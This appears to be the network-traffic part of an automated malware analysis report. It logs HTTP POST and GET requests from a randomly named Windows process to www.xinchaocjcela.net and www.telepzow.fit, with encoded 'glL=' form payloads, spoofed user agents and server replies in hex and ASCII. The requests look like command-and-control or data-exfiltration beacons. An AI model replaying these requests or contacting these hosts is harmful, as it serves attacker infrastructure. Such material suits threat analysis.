                                                            Data Ascii: a-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div
                                                            Dec 16, 2024 22:03:35.140880108 CET1236INData Raw: 6f 75 72 20 77 65 62 73 69 74 65 20 74 6f 20 61 6e 79 20 6f 66 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 73 2e 20 46 6f 6c 6c 6f 77 20 74 68 65 20 61 72 74 69 63 6c 65 20 62 65 6c 6f 77 20 74 6f 20 61 64 64 20 79 6f 75 72 20 64 6f 6d
                                                            Data Ascii: our website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a websit
                                                            Dec 16, 2024 22:03:35.141570091 CET1236INData Raw: 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 22 29 7d 7d 3b 76 61 72 20 6f 3d 33 36 2c 72 3d 32 31 34 37 34 38 33 36 34 37 3b 66 75 6e 63 74 69 6f 6e 20 65 28 6f 2c 72 29 7b 72 65 74 75 72 6e 20 6f 2b 32 32 2b 37 35 2a 28 6f 3c 32 36 29 2d 28 28 30 21 3d
                                                            Data Ascii: urn e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=f
                                                            Dec 16, 2024 22:03:35.141586065 CET1212INData Raw: 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 3b 61 26 26 28 77 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 29 29 3b 76 61 72 20 76 3d 28 74 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 2e 74 6f 4c 6f 77
                                                            Data Ascii: i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+(


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.54991318.143.155.63802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:41.013056993 CET838OUTPOST /bpfk/ HTTP/1.1
                                                            Host: www.xinchaocjcela.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.xinchaocjcela.net
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.xinchaocjcela.net/bpfk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 68 4e 76 51 62 37 63 53 42 6a 67 31 7a 74 50 35 2b 61 38 49 5a 72 4e 69 6c 65 6c 7a 6f 47 66 2f 4a 55 57 65 79 63 45 76 68 49 2f 59 37 42 49 55 32 53 61 75 6a 6b 69 76 6a 35 70 49 4c 53 67 6d 76 41 58 48 37 31 75 61 45 36 6d 42 30 6a 79 54 65 6e 41 69 4c 4f 73 67 39 4c 48 30 5a 78 31 54 66 59 59 4a 30 45 52 36 4c 67 33 66 73 57 67 2f 5a 53 44 46 35 4e 41 79 56 66 49 43 4a 75 51 37 34 61 6a 31 61 49 47 73 2b 48 71 7a 38 53 69 56 59 72 4f 70 59 64 57 76 4a 59 64 41 63 57 73 50 62 63 4d 4e 6e 71 56 54 59 38 2b 30 79 47 74 2b 54 36 75 53 47 6d 70 6b 43 58 4b 33 69 76 4d 4f 69 4e 41 38 53 33 77 3d
                                                            Data Ascii: glL=hNvQb7cSBjg1ztP5+a8IZrNilelzoGf/JUWeycEvhI/Y7BIU2Saujkivj5pILSgmvAXH71uaE6mB0jyTenAiLOsg9LH0Zx1TfYYJ0ER6Lg3fsWg/ZSDF5NAyVfICJuQ74aj1aIGs+Hqz8SiVYrOpYdWvJYdAcWsPbcMNnqVTY8+0yGt+T6uSGmpkCXK3ivMOiNA8S3w=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.54992018.143.155.63802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:43.725243092 CET858OUTPOST /bpfk/ HTTP/1.1
                                                            Host: www.xinchaocjcela.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.xinchaocjcela.net
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.xinchaocjcela.net/bpfk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 68 4e 76 51 62 37 63 53 42 6a 67 31 7a 4e 2f 35 2f 39 6f 49 66 4c 4e 68 38 2b 6c 7a 6d 6d 66 37 4a 55 61 65 79 65 31 6f 68 36 72 59 34 68 34 55 31 54 61 75 77 55 69 76 37 70 70 4e 54 79 67 70 76 41 72 50 37 77 57 61 45 36 79 42 30 67 6d 54 66 57 41 68 5a 75 73 75 31 72 48 32 55 52 31 54 66 59 59 4a 30 46 30 79 4c 67 2f 66 73 6e 77 2f 57 54 44 47 2f 39 41 78 63 2f 49 43 62 65 51 2f 34 61 6a 44 61 4a 61 53 2b 46 43 7a 38 58 65 56 57 61 4f 6f 53 64 57 74 57 49 63 77 61 55 31 63 55 39 6b 46 6b 62 59 52 4f 61 32 77 2b 51 63 55 4a 59 6d 36 56 47 46 63 53 45 43 41 7a 66 74 6e 34 75 51 4d 4d 67 6b 4e 58 58 6f 38 53 33 59 74 6c 4f 44 6e 69 33 53 74 35 58 6f 78
                                                            Data Ascii: glL=hNvQb7cSBjg1zN/5/9oIfLNh8+lzmmf7JUaeye1oh6rY4h4U1TauwUiv7ppNTygpvArP7wWaE6yB0gmTfWAhZusu1rH2UR1TfYYJ0F0yLg/fsnw/WTDG/9Axc/ICbeQ/4ajDaJaS+FCz8XeVWaOoSdWtWIcwaU1cU9kFkbYROa2w+QcUJYm6VGFcSECAzftn4uQMMgkNXXo8S3YtlODni3St5Xox


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.54992918.143.155.63802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:46.468830109 CET1875OUTPOST /bpfk/ HTTP/1.1
                                                            Host: www.xinchaocjcela.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.xinchaocjcela.net
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.xinchaocjcela.net/bpfk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 68 4e 76 51 62 37 63 53 42 6a 67 31 7a 4e 2f 35 2f 39 6f 49 66 4c 4e 68 38 2b 6c 7a 6d 6d 66 37 4a 55 61 65 79 65 31 6f 68 36 7a 59 34 53 77 55 33 77 79 75 68 6b 69 76 7a 4a 70 4d 54 79 67 4f 76 45 2f 78 37 77 4c 76 45 34 4b 42 30 41 36 54 4f 55 34 68 41 65 73 75 35 4c 48 33 5a 78 31 47 66 59 49 46 30 45 45 79 4c 67 2f 66 73 6b 34 2f 66 69 44 47 6b 39 41 79 56 66 49 47 4a 75 51 62 34 65 48 54 61 4a 66 6e 2f 31 69 7a 38 33 75 56 61 49 6d 6f 55 4e 57 6a 58 49 63 6f 61 55 49 45 55 39 6f 6a 6b 62 73 76 4f 64 36 77 37 6d 64 75 61 36 61 39 49 33 6c 38 51 6d 47 6d 68 59 59 42 77 4d 73 57 44 41 45 56 53 48 6b 69 45 7a 55 71 6f 4f 54 76 35 78 43 4c 7a 6a 35 47 34 34 4f 55 54 6a 42 75 46 73 30 63 62 4e 69 46 77 53 75 4f 45 54 66 58 49 4c 55 75 57 62 78 71 74 77 61 57 4e 51 74 6f 52 4a 35 31 58 79 78 47 2f 7a 4f 67 4a 44 6d 56 4f 44 4d 70 55 69 79 34 69 63 66 66 4e 7a 6e 62 61 31 79 7a 6d 79 71 6d 6e 48 71 46 55 38 74 55 68 79 45 6a 49 73 33 4a 64 53 2f 36 2f 79 66 76 52 54 4e 73 4e 4a 62 38 49 50 [TRUNCATED]
                                                            Data Ascii: glL=hNvQb7cSBjg1zN/5/9oIfLNh8+lzmmf7JUaeye1oh6zY4SwU3wyuhkivzJpMTygOvE/x7wLvE4KB0A6TOU4hAesu5LH3Zx1GfYIF0EEyLg/fsk4/fiDGk9AyVfIGJuQb4eHTaJfn/1iz83uVaImoUNWjXIcoaUIEU9ojkbsvOd6w7mdua6a9I3l8QmGmhYYBwMsWDAEVSHkiEzUqoOTv5xCLzj5G44OUTjBuFs0cbNiFwSuOETfXILUuWbxqtwaWNQtoRJ51XyxG/zOgJDmVODMpUiy4icffNznba1yzmyqmnHqFU8tUhyEjIs3JdS/6/yfvRTNsNJb8IPpfQ7+bVD4JhnuU9klscXfutTcRxU5DGsU/VwxnrgIEPYihX8t7OT39db94c8jbsNSfIwPd/IuHlHyDeIE5P2kXXtuKmNGJRyPfha9UxRaVQ0qaBwK/h0+kPgUqtAP1ozBANE0UbRs/tIVdt2FaV2XwVCj3898h85r1MZMYv6X2xtEFgvuMuYTcfi2fOHukypwcZ2oi2LTSEatOlbRn5U2X9WdHQ+DrJMZN1Lh+jylbcHz5K9IV8F95uItjyeyJsNBZW9fwAgTH56KUhSHPhx9N7ceiS20l++c2RsInTHTBDitEvPDn85WXKTtkxi9+brbM62E5bhzSjlXyRtXArIhKixw1/gGEn7eUkE8dYkh15nojGREH21Kx4dEKNLZCpiem17miX73iOX//Z6gMA58h7SzvhQupW9tGiNY6rPS2gqzZyZG0qhYeU0+unwcvLACbOxM0jO+psGT3nQ1zJzRykVKiWNNG4Erd1LOtxTOPqXXBsQltra9wcx5jDiMhJulJ+xRiOJLbW11261WsxMMmt866nZN9zxeNzaRe67+1UwjiBitwVQGPmTUynbhcZukNz3qVKXDtJ2en96HNmMQvnx5dkK/SRC0cdFh/qP/noW5QHzrb2ufPqmlaJ2B1su/cGWgRB6RXKN3MCaajK5VcMzpOnD92qxlf [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.54993618.143.155.63802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:49.131628036 CET569OUTGET /bpfk/?glL=sPHwYLohOQUi7tbny8xAX65Ak8k0vxLoER6T/oVqsoypwBs53zqD5Fqu0PMIJSMinBeTsBqmPa+l3heiZ3MyHfx16PXUeUVxWIEE2iZ6N1rL+1ViRRDgwfUXWv4GRPFujA==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.xinchaocjcela.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:03:51.172766924 CET682INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:03:50 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                            Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                            Set-Cookie: btst=3426b4c18c5c1dadbc527ac7a2d9d5d6|8.46.123.189|1734383030|1734383030|0|1|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.549952104.21.64.208802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:56.742886066 CET823OUTPOST /98fz/ HTTP/1.1
                                                            Host: www.telepzow.fit
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.telepzow.fit
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.telepzow.fit/98fz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 63 4c 4a 36 37 59 78 6d 66 58 42 45 36 4a 4c 53 33 42 47 6e 64 6a 49 70 38 43 57 63 55 73 4a 48 2f 50 75 73 67 76 37 4e 2f 34 58 68 48 78 2b 72 56 4f 39 39 75 4b 4c 59 7a 74 68 41 42 45 4f 61 52 49 32 63 4d 75 68 2f 74 45 77 56 46 69 6a 4c 4e 39 71 48 73 69 71 43 46 54 72 35 6a 43 34 52 58 70 43 75 31 56 4a 43 49 53 46 44 68 46 69 37 45 42 52 67 54 5a 6c 6e 30 63 4d 43 31 7a 70 4d 49 62 4d 58 69 72 52 51 65 56 6f 6f 43 6a 43 31 45 46 43 41 48 47 39 67 6f 31 4f 48 75 4f 33 2f 48 47 56 62 75 43 6c 64 2b 58 69 31 31 65 4f 6c 79 6f 57 54 51 49 44 43 69 39 79 2f 77 72 48 76 6c 50 2b 70 7a 64 41 3d
                                                            Data Ascii: glL=cLJ67YxmfXBE6JLS3BGndjIp8CWcUsJH/Pusgv7N/4XhHx+rVO99uKLYzthABEOaRI2cMuh/tEwVFijLN9qHsiqCFTr5jC4RXpCu1VJCISFDhFi7EBRgTZln0cMC1zpMIbMXirRQeVooCjC1EFCAHG9go1OHuO3/HGVbuCld+Xi11eOlyoWTQIDCi9y/wrHvlP+pzdA=
                                                            Dec 16, 2024 22:03:58.375479937 CET978INHTTP/1.1 404 Not Found
                                                            Date: Mon, 16 Dec 2024 21:03:58 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdCRCE9q0%2BZzewy9FA1ukCw2ZCSIDRJ4wNc85Bdv3zD7WkI0%2BGmnmGedplvA2eFeCEleFhKNFpqRH1AAcp2hx3Fj%2Fbyqeund%2BS8S2XzNGvBNnJHZkWwplEEWXKDIIM8NpakJ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f319f818ec36a5f-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1620&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 8c 2d 05 37 43 36 a2 e0 42 37 9e 20 75 c6 26 90 26 65 8c 60 6f 2f 55 0b e2 da a5 ab 81 ff df 7f 0c ba dc 07 53 16 e8 d8 92 c1 ec 73 60 d3 ac 1a 38 a6 0c bb 74 8b 84 fa 15 a2 7e 22 65 81 6d a2 71 ba 67 8e 99 c5 a0 ab be 17 ae 32 a8 df f5 e4 16 33 c3 b1 f3 f1 ae ab 65 bd 5e d6 9f 88 9e a5 7a 7e 68 a1 14 58 18 2c 91 8f 1d e4 04 e4 af b6 0d 0c 87 d3 7e 0b 36 12 6c 9c a4 9e e1 22 9e 23 85 11 58 24 09 0c b6 63 50 ea af f8 b5 e2 01 82 0d 95 02 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: afA0Ea<@-7C6B7 u&&e`o/USs`8t~"emqg23e^z~hX,~6l"#X$cP+0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.549961104.21.64.208802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:59.410849094 CET843OUTPOST /98fz/ HTTP/1.1
                                                            Host: www.telepzow.fit
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.telepzow.fit
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.telepzow.fit/98fz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 63 4c 4a 36 37 59 78 6d 66 58 42 45 37 6f 62 53 36 43 2b 6e 55 6a 49 71 35 43 57 63 65 4d 4a 44 2f 50 79 73 67 71 62 64 2f 4b 44 68 47 54 32 72 48 63 56 39 70 4b 4c 59 67 74 68 50 63 55 4f 72 52 49 37 76 4d 73 46 2f 74 48 4d 56 46 6a 54 4c 4b 50 43 47 76 53 71 4d 45 6a 72 2f 6e 43 34 52 58 70 43 75 31 56 64 6f 49 53 4e 44 68 30 53 37 45 6a 35 6a 61 35 6c 6b 33 63 4d 43 69 44 70 49 49 62 4d 6c 69 71 63 59 65 58 67 6f 43 6d 2b 31 46 51 2b 42 4a 47 39 6d 72 46 50 76 2f 74 58 37 42 55 42 55 6d 67 77 64 6c 6d 6e 4d 30 6f 2f 50 6f 4b 65 37 44 6f 76 36 79 75 36 49 68 62 6d 47 2f 73 75 5a 74 4b 56 77 6e 69 42 6c 35 4e 45 42 53 70 4b 34 5a 34 62 44 63 71 44 68
                                                            Data Ascii: glL=cLJ67YxmfXBE7obS6C+nUjIq5CWceMJD/Pysgqbd/KDhGT2rHcV9pKLYgthPcUOrRI7vMsF/tHMVFjTLKPCGvSqMEjr/nC4RXpCu1VdoISNDh0S7Ej5ja5lk3cMCiDpIIbMliqcYeXgoCm+1FQ+BJG9mrFPv/tX7BUBUmgwdlmnM0o/PoKe7Dov6yu6IhbmG/suZtKVwniBl5NEBSpK4Z4bDcqDh
                                                            Dec 16, 2024 22:04:01.010770082 CET981INHTTP/1.1 404 Not Found
                                                            Date: Mon, 16 Dec 2024 21:04:00 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FotBM2D8i1rV%2Bwoc9k4t%2BICv79U7RJ4njTQqxI7s25twjWJf0o2ndG%2BPdlA%2BbyfUyQ3k0UMOD9BT3dbhKaEFFRCOJsH6yFQBov0klluD%2FUuo1qXvmKz8GzI60gGzHIlh0W5"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f319f921ca4c35e-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=57&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 8c 2d 05 37 43 36 a2 e0 42 37 9e 20 75 c6 26 90 26 65 8c 60 6f 2f 55 0b e2 da a5 ab 81 ff df 7f 0c ba dc 07 53 16 e8 d8 92 c1 ec 73 60 d3 ac 1a 38 a6 0c bb 74 8b 84 fa 15 a2 7e 22 65 81 6d a2 71 ba 67 8e 99 c5 a0 ab be 17 ae 32 a8 df f5 e4 16 33 c3 b1 f3 f1 ae ab 65 bd 5e d6 9f 88 9e a5 7a 7e 68 a1 14 58 18 2c 91 8f 1d e4 04 e4 af b6 0d 0c 87 d3 7e 0b 36 12 6c 9c a4 9e e1 22 9e 23 85 11 58 24 09 0c b6 63 50 ea af f8 b5 e2 01 82 0d 95 02 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: afA0Ea<@-7C6B7 u&&e`o/USs`8t~"emqg23e^z~hX,~6l"#X$cP+0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.549968104.21.64.208802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:02.074033022 CET1860OUTPOST /98fz/ HTTP/1.1
                                                            Host: www.telepzow.fit
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.telepzow.fit
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.telepzow.fit/98fz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 63 4c 4a 36 37 59 78 6d 66 58 42 45 37 6f 62 53 36 43 2b 6e 55 6a 49 71 35 43 57 63 65 4d 4a 44 2f 50 79 73 67 71 62 64 2f 4c 37 68 47 68 4f 72 56 74 56 39 6f 4b 4c 59 37 4e 67 6f 63 55 4f 4d 52 49 54 6a 4d 73 49 43 74 43 41 56 44 42 62 4c 4c 2b 43 47 30 69 71 4d 50 44 72 2b 6a 43 34 45 58 6f 79 69 31 56 4e 6f 49 53 4e 44 68 32 4b 37 43 78 52 6a 63 35 6c 6e 30 63 4d 47 31 7a 70 73 49 66 68 53 69 71 5a 36 5a 6b 59 6f 43 47 4f 31 47 6d 71 42 46 47 39 6b 69 56 50 33 2f 74 61 6c 42 55 4e 75 6d 68 45 6e 6c 68 72 4d 32 39 4b 6c 31 61 47 35 55 71 4c 62 2b 35 69 55 35 73 32 68 36 71 2f 73 77 4c 4e 4e 36 68 78 64 35 4e 77 4f 55 62 48 67 41 74 72 44 52 4e 36 4b 72 46 34 64 77 70 56 50 49 50 4d 2f 6b 54 79 48 4d 77 66 4d 6e 41 35 6c 52 51 44 39 43 45 70 62 51 41 6b 61 6d 33 33 63 30 73 63 63 41 39 6a 76 6d 69 38 6b 46 31 51 45 58 56 47 46 73 6f 76 79 47 66 76 36 38 63 53 63 41 48 37 48 58 37 73 52 54 47 58 57 4f 79 77 6f 6b 71 74 35 38 73 4c 39 55 62 30 6d 47 6c 73 49 30 4b 35 7a 61 59 4b 65 42 42 [TRUNCATED]
                                                            Data Ascii: glL=cLJ67YxmfXBE7obS6C+nUjIq5CWceMJD/Pysgqbd/L7hGhOrVtV9oKLY7NgocUOMRITjMsICtCAVDBbLL+CG0iqMPDr+jC4EXoyi1VNoISNDh2K7CxRjc5ln0cMG1zpsIfhSiqZ6ZkYoCGO1GmqBFG9kiVP3/talBUNumhEnlhrM29Kl1aG5UqLb+5iU5s2h6q/swLNN6hxd5NwOUbHgAtrDRN6KrF4dwpVPIPM/kTyHMwfMnA5lRQD9CEpbQAkam33c0sccA9jvmi8kF1QEXVGFsovyGfv68cScAH7HX7sRTGXWOywokqt58sL9Ub0mGlsI0K5zaYKeBBlXUwi4yUqU1uia+VNcabXm+eH6PXcNptGO/rx6JMDixuBaV+sgIbjIkezywr1W/oB/JkhPDP2++awTy3KhmAIF1SatJhPrW0kxVgPUOWYcBdaayHzKENXlFmAUDk4oHK1TS3c4+pNKJTXVqKC0dXZ2WR0YyX9MtwqLtLL2cnRzz6V0YrYEntDn2NT1M/9B54imaScIvetn1KLMBH8c10pB5c4bzn0Ae1iVysLZS2nV9vI5Xh6tW2sQjIVsR4sIfUlAoK6TtuQbt/+bSCm/VmIHcBtuVmRUQMp8H+ErWe231zuQFKowHWKbGm7z+0sa4dcTlb8BsiPeEth07RQ7P81hl9QNBfMRz5v2TuO65ZK+e1l2HJNvJz0ZLLjoIuGBVe71CSvCI6FDm/VHBTJTpjTAm7suZDvYA3zMcL/gmCVJd1bOfRpSSBMKB38Ve1zW+i1Ve0XRluzfwl8SLbaHah9Vv/+8G5ApM9/t0mGN+35GH9z5JZ52XrPEAltWvp6rpZuXJzNA1+Tog6umqA3VyqkzB4id5HViU7s6i6aGI1Md4/6ylgDzHj89/eIHt80IC0XnCBG7zWI1/yYrp9xAK+n2Bj0JOklRkrpd0WZsW34hG1xsO7j9aHMUAuCU3R3hSK1cG27ExqHsPy6MQVXVTsrQNZXtvuJamIKd [TRUNCATED]
                                                            Dec 16, 2024 22:04:03.695151091 CET980INHTTP/1.1 404 Not Found
                                                            Date: Mon, 16 Dec 2024 21:04:03 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZutYpEb21Dv7mnYTybT68aiq64RJl1%2B4N6mJt8LQDyDwPWL8b9Vqp9CsUOHgPcLkpgsVUhMsdZiKzBuMlKBV%2FRviQqxKJyLsLNLzQmT%2FN%2Bh516c4mYsAK5l8PRr2aNd6Jhrr"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f319fa2ac098c54-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
